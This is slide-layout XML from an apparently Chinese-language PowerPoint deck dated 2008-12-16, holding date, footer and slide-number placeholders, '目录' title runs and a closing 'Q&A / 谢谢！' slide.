                <a:defRPr/>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3E6BA47-7F3C-47B3-B841-F476889A9A8D}"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13EFC98-58CA-4F1C-8437-3B9908DC2785}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>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7B2F09DD-C5C5-47C5-88BB-B159964330C4}"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931C648-514E-42B9-B7B6-3AF9DBD4FDF1}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>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DE1E3CA7-A6A9-4EDF-8788-7C372798CC09}"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BF5E066-D6A0-4B5F-8881-F07C27D69FE4}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>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82781E49-0EB8-4A50-867B-A5FFC7534C99}"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4041F64F-B624-44E5-A580-420436F5CBDA}"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3B05F2F7-74AA-4849-B41A-056C3E956EFA}"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68A837-C869-401E-80AB-EDA83A9383B2}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>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509E7583-131B-408E-A322-36EC66F49382}"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3D2DE4A-67A9-4229-A34C-DD1E7CD9290A}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>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F69605B-259D-49B3-912E-B41A0EB09B72}"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23C7822-47D6-42A7-A93C-1E770AEC842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latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Q&amp;A</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5400" b="1" dirty="0">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28B85544-9E02-4C07-ABC3-B02B9D13206C}"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56566C29-600E-4B27-B771-FA78A48FD782}"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E34455E6-A7CD-49D5-8C6B-A96134B3D922}"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D76E74DD-6257-453F-AD61-A7516EE23D17}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>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D2A5CFE-4BB4-4B41-98B6-1C140D624004}"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34DBA3-2CF1-4E79-A05C-0616C75FEBF0}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>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A5BC749F-BBE0-4B7D-AA8B-23D2D00E716E}"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0D1F6BA5-45E6-4B09-81CA-240EB88E6252}"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E6D950EB-E7BB-41E4-BA7D-B837EEB0946A}"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0CFAD20-2D31-438E-AF2C-21EC94DE3A8C}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>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defRPr/>
            </a:pPr>
            <a:fld id="{4B64BEF0-8653-4EF2-9B75-4BEF43CC6862}"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88733B-1E2B-48AF-AD7A-D23C58F1F854}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>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D35C47F-FD2A-4AF9-904A-2E0EB1035BAA}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2008-12-16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CEF08D9-6AA5-41F3-9B6E-59083ACAB692}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>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a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="5400" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Q&amp;A</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5400" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>　谢　谢！</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="日期占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{8EB1DE61-D616-44EC-B7D1-E2249C5B2C46}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>2008-12-16</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27C0E4AC-E90F-4203-A8CE-BA9CC8691F6E}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>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lgn="l" rtl="0">
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{771CEF1D-AFF9-4AC3-89A9-281ECFCB9EBB}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:tint val="75000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:pPr algn="l" rtl="0">
                <a:defRPr/>
              </a:pPr>
              <a:t>2008-12-16</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:tint val="75000"/>
                </a:prstClr>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="页脚占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr" rtl="0">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:tint val="75000"/>
                </a:prstClr>
              </a:solidFill>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a:defRPr/>
            </a:pPr>
            <a:fld id="{1CD8656F-2451-47C7-96B2-7BE9CA89444A}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:tint val="75000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:pPr algn="r" rtl="0">
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:tint val="75000"/>
                </a:prstClr>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体"/>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rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F81BD">
                    <a:lumMod val="75000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>目录</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F81BD">
                    <a:lumMod val="75000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-cs"/>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rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F81BD">
                    <a:lumMod val="75000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>目录</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F81BD">
                    <a:lumMod val="75000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-cs"/>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a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                    <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                    <a:cs typeface="+mn-cs"/>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dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                  <a:cs typeface="+mn-cs"/>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rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F81BD">
                    <a:lumMod val="75000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>目录</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4F81BD">
                    <a:lumMod val="75000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-cs"/>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a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                    <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                    <a:cs typeface="+mn-cs"/>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a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                  <a:cs typeface="+mn-cs"/>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rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4F81BD">
                  <a:lumMod val="75000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              <a:cs typeface="+mn-cs"/>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a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                    <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                    <a:cs typeface="+mn-cs"/>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dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                  <a:cs typeface="+mn-cs"/>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rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>目录</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-cs"/>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a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                    <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                    <a:cs typeface="+mn-cs"/>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lgn="l" rtl="0" fontAlgn="base">
                  <a:spcBef>
                    <a:spcPct val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPct val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="zh-CN" altLang="en-US" kern="1200">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" charset="0"/>
                  <a:ea typeface="宋体"/>
                  <a:cs typeface="+mn-cs"/>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lgn="l" rtl="0" fontAlgn="base">
                  <a:spcBef>
                    <a:spcPct val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPct val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="zh-CN" altLang="en-US" kern="1200">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                  <a:cs typeface="+mn-cs"/>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rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" kern="1200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                  <a:cs typeface="+mn-cs"/>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lgn="l" rtl="0">
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{D18A511E-51F5-480B-8470-0C83E9117902}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:tint val="75000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:pPr algn="l" rtl="0">
                <a:defRPr/>
              </a:pPr>
              <a:t>2008-12-16</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:tint val="75000"/>
                </a:prstClr>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="页脚占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr" rtl="0">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:tint val="75000"/>
                </a:prstClr>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="灯片编号占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="r" rtl="0">
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{B75476FD-B49E-457F-AD60-850F35EC13A8}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:tint val="75000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:pPr algn="r" rtl="0">
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:tint val="75000"/>
                </a:prstClr>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体"/>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lgn="l" rtl="0">
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{57373F60-2FE9-4DF2-AA57-1C8B408D8932}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:tint val="75000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:pPr algn="l" rtl="0">
                <a:defRPr/>
              </a:pPr>
              <a:t>2008-12-16</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:tint val="75000"/>
                </a:prstClr>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="页脚占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr" rtl="0">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:tint val="75000"/>
                </a:prstClr>
              </a:solidFill>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a:defRPr/>
            </a:pPr>
            <a:fld id="{51511C10-6E19-4926-B318-CA2F9F912018}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:tint val="75000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:pPr algn="r" rtl="0">
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:tint val="75000"/>
                </a:prstClr>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体"/>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首页">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43438" y="3929066"/>
            <a:ext cx="3357586" cy="1285884"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="3200" b="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋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标题 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4286248" y="2214554"/>
            <a:ext cx="4000528" cy="1500198"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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33AC744-2A6D-4910-A09C-82E2B75F19E5}"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7FA975-FB54-46F4-8634-6441D08218B3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr>
                <a:defRPr/>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new正文">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="928662" y="1857364"/>
            <a:ext cx="7215238" cy="39290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10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="l" rtl="0">
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{7C1D5422-933D-473E-9A57-62E47AA6E1B7}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:tint val="75000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:pPr algn="l" rtl="0">
                <a:defRPr/>
              </a:pPr>
              <a:t>2008-12-16</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:tint val="75000"/>
                </a:prstClr>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="页脚占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr" rtl="0">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:tint val="75000"/>
                </a:prstClr>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="r" rtl="0">
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{1F116C2D-4334-4D10-B6A6-548E06BAB63F}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:tint val="75000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:pPr algn="r" rtl="0">
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:tint val="75000"/>
                </a:prstClr>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体"/>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new正文 自由">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lgn="l" rtl="0">
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{1FE4143B-FE35-4C70-AF93-FAD985FE3099}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200">
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:tint val="75000"/>
                  </a:prstClr>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:pPr algn="l" rtl="0">
                <a:defRPr/>
              </a:pPr>
              <a:t>2008-12-16</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" kern="1200">
              <a:solidFill>
                <a:prstClr val="black">
                  <a:tint val="75000"/>
                </a:prstClr>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="宋体"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="页脚占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr" rtl="0">
